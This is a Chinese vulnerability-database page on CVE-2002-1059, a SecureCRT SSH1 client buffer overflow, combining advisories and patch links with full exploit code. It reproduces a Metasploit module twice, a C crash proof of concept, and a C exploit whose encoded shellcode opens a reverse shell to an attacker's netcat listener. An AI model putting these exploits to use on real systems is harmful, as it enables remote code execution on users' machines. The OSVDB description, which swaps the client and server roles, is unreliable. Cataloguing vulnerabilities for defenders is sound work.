CVE-2002-1059
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2016-10-17 22:23:33
NMCOEPS    

[原文]Buffer overflow in Van Dyke SecureCRT SSH client before 3.4.6, and 4.x before 4.0 beta 3, allows an SSH server to execute arbitrary code via a long SSH1 protocol version string.


[CNNVD]VanDyke SecureCRT SSH1协议处理远程缓冲区溢出漏洞(CNNVD-200210-223)

        
        SecureCRT是一款流行的SSH客户端,可使用在Microsoft Windows操作系统下。
        SecureCRT对服务器返回的SSH1协议版本号信息缺少正确的处理,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        当SecureCRT连接SSH1服务器时,服务程序会返回包含重要和次要数字的协议版本字符串,SecureCRT对返回的协议版本字符串缺少正确的边界缓冲检查,远程攻击者可以利用这个漏洞提交超长的协议版本字符串给SecureCRT处理,可导致客户端产生缓冲区溢出攻击,精心构建提交的协议版本字符串可能可以以SecureCRT进程在系统中执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:van_dyke_technologies:securecrt:3.4.3
cpe:/a:van_dyke_technologies:securecrt:3.4.4
cpe:/a:van_dyke_technologies:securecrt:3.3.2
cpe:/a:van_dyke_technologies:securecrt:3.4.1
cpe:/a:van_dyke_technologies:securecrt:3.3.3
cpe:/a:van_dyke_technologies:securecrt:3.4.2
cpe:/a:van_dyke_technologies:securecrt:4.0_beta_1
cpe:/a:van_dyke_technologies:securecrt:3.4.5
cpe:/a:van_dyke_technologies:securecrt:3.0
cpe:/a:van_dyke_technologies:securecrt:3.2
cpe:/a:van_dyke_technologies:securecrt:4.0_beta_2
cpe:/a:van_dyke_technologies:securecrt:3.1
cpe:/a:van_dyke_technologies:securecrt:3.1.2
cpe:/a:van_dyke_technologies:securecrt:3.2.1
cpe:/a:van_dyke_technologies:securecrt:3.4
cpe:/a:van_dyke_technologies:securecrt:2.4
cpe:/a:van_dyke_technologies:securecrt:3.3
cpe:/a:van_dyke_technologies:securecrt:3.3.1
cpe:/a:van_dyke_technologies:securecrt:3.1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1059
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1059
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-223
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=102744150718462&w=2
(UNKNOWN)  BUGTRAQ  20020723 Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta
http://marc.info/?l=bugtraq&m=102746007908689&w=2
(UNKNOWN)  BUGTRAQ  20020723 Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT
http://www.iss.net/security_center/static/9650.php
(VENDOR_ADVISORY)  XF  securecrt-ssh1-identifier-bo(9650)
http://www.securityfocus.com/bid/5287
(VENDOR_ADVISORY)  BID  5287
http://www.vandyke.com/products/securecrt/security07-25-02.html
(UNKNOWN)  CONFIRM  http://www.vandyke.com/products/securecrt/security07-25-02.html

- 漏洞信息

VanDyke SecureCRT SSH1协议处理远程缓冲区溢出漏洞
高危 边界条件错误
2002-10-04 00:00:00 2005-05-02 00:00:00
远程  
        
        SecureCRT是一款流行的SSH客户端,可使用在Microsoft Windows操作系统下。
        SecureCRT对服务器返回的SSH1协议版本号信息缺少正确的处理,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        当SecureCRT连接SSH1服务器时,服务程序会返回包含重要和次要数字的协议版本字符串,SecureCRT对返回的协议版本字符串缺少正确的边界缓冲检查,远程攻击者可以利用这个漏洞提交超长的协议版本字符串给SecureCRT处理,可导致客户端产生缓冲区溢出攻击,精心构建提交的协议版本字符串可能可以以SecureCRT进程在系统中执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 不要使用SSH1协议访问不可信的SSH服务器。
        厂商补丁:
        Van Dyke Technologies
        ---------------------
        Van Dyke Technologies已经为此发布了一个安全公告(security07-25-02)以及相应补丁:
        security07-25-02:Security Advisory SecureCRT 2.x, 3.x, 4.0 beta
        链接:
        http://www.vandyke.com/products/securecrt/security07-25-02.html

        补丁下载:
        SecureCRT 4.0 (beta 3) -
        http://www.vandyke.com/download/securecrt/beta.html

        SecureCRT 3.4.6 -
        http://www.vandyke.com/download/securecrt

        SecureCRT 3.3.4 -
        http://www.vandyke.com/download/securecrt/3.3/index.html

        SecureCRT 3.2.2 -
        http://www.vandyke.com/download/securecrt/3.2/index.html

- 漏洞信息 (16460)

SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow (EDBID:16460)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: securecrt_ssh1.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in SecureCRT <= 4.0
				Beta 2. By sending a vulnerable client an overly long
				SSH1 protocol identifier string, it is possible to execute
				arbitrary code.

				This module has only been tested on SecureCRT 3.4.4.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2002-1059' ],
					[ 'OSVDB', '4991' ],
					[ 'BID', '5287' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 23 2002',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)

		buffer =  "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
		buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded

		print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

		client.put(buffer)
		handler

		service.close_client(client)
	end

end
		

- 漏洞信息 (21634)

SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (1) (EDBID:21634)
windows dos
2002-07-23 Verified
0 Kyuzo
N/A [点击下载]
source: http://www.securityfocus.com/bid/5287/info

The SecureCRT client is prone to a buffer-overflow condition when attempting to handle an overly long SSH1 protocol identifier string. Reportedly, an attacker can exploit this issue via a malicious server. 

Exploiting this issue may allow an attacker to execute arbitrary code or may cause the client to crash.

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 9988

int main(int argc, char **argv) {
    int s, n, i, sz = sizeof(struct sockaddr_in);
    struct sockaddr_in local, whatever;
    char payload[510];

    strcpy(payload, "SSH-1.1-");
    for (i = 8; i < 508; i++)
        payload[i] = 'A';
    payload[508] = '\n';
    payload[509] = '\0';

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        return 1;
    }
    local.sin_family = AF_INET;
    local.sin_port = htons(PORT);
    local.sin_addr.s_addr = INADDR_ANY;
    memset(&(local.sin_zero), 0, 8);
    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) 
{
        perror("bind");
        return 1;
    }
    if (listen(s, 2) == -1)  {
        perror("listen");
        return 1;
    }
    printf("waiting for connection...\n");
    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
        perror("accept");
        return 1;
    }
    printf("client connected\n");
    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
        perror("send");
        return 1;
    }
    printf("sent string: [%s]\n", payload);
    close(n);
    close(s);
    return 0;
}
		

- 漏洞信息 (21635)

SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (2) (EDBID:21635)
windows remote
2002-07-23 Verified
0 andrea lisci
N/A [点击下载]
source: http://www.securityfocus.com/bid/5287/info
 
The SecureCRT client is prone to a buffer-overflow condition when attempting to handle an overly long SSH1 protocol identifier string. Reportedly, an attacker can exploit this issue via a malicious server.
 
Exploiting this issue may allow an attacker to execute arbitrary code or may cause the client to crash.

// The bug was discovered by Kyuzo
// The schell code exploit was coded by Andrea Lisci
// The program working in the following way
//
// run the exploit
//./shellcode <netcat_machine> <netcat_port>
// run the netcat
// nc -l -p <netcat_port>
// connect from secureCRT to the port 9988 using ssh version 1
//
// the remote shell will be opened at netcat computer



#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 9988

int main(int argc, char **argv) {
    int s, n, i, sz = sizeof(struct sockaddr_in);
    struct sockaddr_in local, whatever;
    char payload[2510], *pshell;

    unsigned char preshell[]="\xb8\x00\x03\xff\xe0";


    unsigned short int a_port;
    unsigned long a_host;
    struct hostent *ht;
    struct sockaddr_in sin;

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";


 a_port=htons(atoi(argv[2]));
 a_port ^= 0x9595;
 //ht=gethostbyname(argv[1]);
 //a_host= (unsigned long) *(ht->h_addr);
 a_host=inet_addr(argv[1]);
 a_host ^= 0x95959595;

 shell[385]= ((a_port) & 0xff);
 shell[386]= ((a_port >> 8 ) & 0xff);
 shell[390]= ((a_host) & 0xff);
 shell[391]= ((a_host >> 8) & 0xff);
 shell[392]= ((a_host >>16) & 0xff);
 shell[393]= ((a_host >>24) & 0xff);

  memset(payload,0x90,sizeof(payload));



    strcpy(payload, "SSH-1.1-");
    for (i = 8; i < 267; i++)
payload[i] = 'A';
    payload[i+1]=0x00;
    payload[i+2]=0xbb;
    payload[i+3]=0x12;
    payload[i+4]=0x00;
    payload[i+5] = '\n';
    payload[i+6]= '\0';

    pshell=&payload;
    pshell+=100;
    memcpy(pshell,preshell,sizeof(preshell));

    pshell=&payload;
    pshell+=300;
    memcpy(pshell,shell,sizeof(shell));


    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
    }
    local.sin_family = AF_INET;
    local.sin_port = htons(PORT);
    local.sin_addr.s_addr = INADDR_ANY;
    memset(&(local.sin_zero), 0, 8);
    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
perror("bind");
return 1;
    }
    if (listen(s, 2) == -1)  {
perror("listen");
return 1;
    }
    printf("waiting for connection...\n");
    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
perror("accept");
return 1;
    }
    printf("client connected\n");
    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
perror("send");
return 1;
    }
    printf("sent string: [%s]\n", payload);
    close(n);
    close(s);
    return 0;
}
		

- 漏洞信息 (F82992)

SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow (PacketStormID:F82992)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary,protocol
CVE-2002-1059
[点击下载]

This Metasploit module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2. By sending a vulnerable client an overly long SSH1 protocol identifier string, it is possible to execute arbitrary code. This Metasploit module has only been tested on SecureCRT 3.4.4.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in SecureCRT <= 4.0
				Beta 2. By sending a vulnerable client an overly long
				SSH1 protocol identifier string, it is possible to execute
				arbitrary code.

				This module has only been tested on SecureCRT 3.4.4.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2002-1059' ],
					[ 'OSVDB', '4991' ],
					[ 'BID', '5287' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 23 2002',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)	

		buffer =  "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
		buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded

		print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

		client.put(buffer)
		handler

		service.close_client(client)
	end

end
    

- 漏洞信息

4991
SecureCRT SSH-1 Protocol Version String Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

VanDyke SecureCRT contains a remote overflow that may allow an attacker to execute arbitrary code. The issue is due to the SSH1 server not properly sanitizing the version string sent by the remote client. If a client sends a specially crafted version string, they may be able to overflow the buffer and execute arbitrary code with the same privileges as the server runs under.

- 时间线

2002-07-23 Unknow
2002-07-22 Unknow

- 解决方案

Upgrade to version 3.2.2, 3.3.4, 3.4.8, 4.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

SecureCRT SSH1 Identifier String Buffer Overflow Vulnerability
Boundary Condition Error 5287
Yes No
2002-07-23 12:00:00 2006-08-10 11:30:00
Discovery of this issue is credited to Kyuzo <ogl@SirDrinkalot.rm-f.net>.

- 受影响的程序版本

VanDyke SecureCRT 4.0 beta 2
VanDyke SecureCRT 4.0 beta 1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
VanDyke SecureCRT 3.4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
VanDyke SecureCRT 3.4.4
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
VanDyke SecureCRT 3.4.3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
VanDyke SecureCRT 3.4.2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
VanDyke SecureCRT 3.4.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
VanDyke SecureCRT 3.4
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
VanDyke SecureCRT 3.3.3
VanDyke SecureCRT 3.3.2
VanDyke SecureCRT 3.3.1
VanDyke SecureCRT 3.3
VanDyke SecureCRT 3.2.1
VanDyke SecureCRT 3.2
VanDyke SecureCRT 3.1.2
VanDyke SecureCRT 3.1.1
VanDyke SecureCRT 3.1
VanDyke SecureCRT 3.0
VanDyke SecureCRT 2.4
VanDyke SecureCRT 4.0 beta 3
VanDyke SecureCRT 3.4.6
VanDyke SecureCRT 3.3.4
VanDyke SecureCRT 3.2.2

- 不受影响的程序版本

VanDyke SecureCRT 4.0 beta 3
VanDyke SecureCRT 3.4.6
VanDyke SecureCRT 3.3.4
VanDyke SecureCRT 3.2.2

- 漏洞讨论

The SecureCRT client is prone to a buffer-overflow condition when attempting to handle an overly long SSH1 protocol identifier string. Reportedly, an attacker can exploit this issue via a malicious server.

Exploiting this issue may allow an attacker to execute arbitrary code or may cause the client to crash.

- 漏洞利用

Exploit code has been developed by "Andrea Lisci" <andrea.lisci@fst.it>.

A proof-of-concept program to demonstrate the overflow condition was submitted by Kyuzo <ogl@SirDrinkalot.rm-f.net>.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A Metasploit exploit module is available.

- 解决方案

The vendor has supplied fixes that address this issue.

SecureCRT users who purchased licenses before January 1, 2000 should upgrade to SecureCRT 3.2.2.

SecureCRT users who purchased licenses before July 1, 2000 should upgrade to SecureCRT 3.3.4.

Secure CRT users who purchased licenses on or later than June 1, 2001 should
upgrade to SecureCRT 3.4.6 or SecureCRT 4.0 beta 3.


VanDyke SecureCRT 2.4

VanDyke SecureCRT 3.0

VanDyke SecureCRT 3.1

VanDyke SecureCRT 3.1.1

VanDyke SecureCRT 3.1.2

VanDyke SecureCRT 3.2

VanDyke SecureCRT 3.2.1

VanDyke SecureCRT 3.3

VanDyke SecureCRT 3.3.1

VanDyke SecureCRT 3.3.2

VanDyke SecureCRT 3.3.3

VanDyke SecureCRT 3.4

VanDyke SecureCRT 3.4.1

VanDyke SecureCRT 3.4.2

VanDyke SecureCRT 3.4.3

VanDyke SecureCRT 3.4.4

VanDyke SecureCRT 3.4.5

VanDyke SecureCRT 4.0 beta 2

VanDyke SecureCRT 4.0 beta 1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站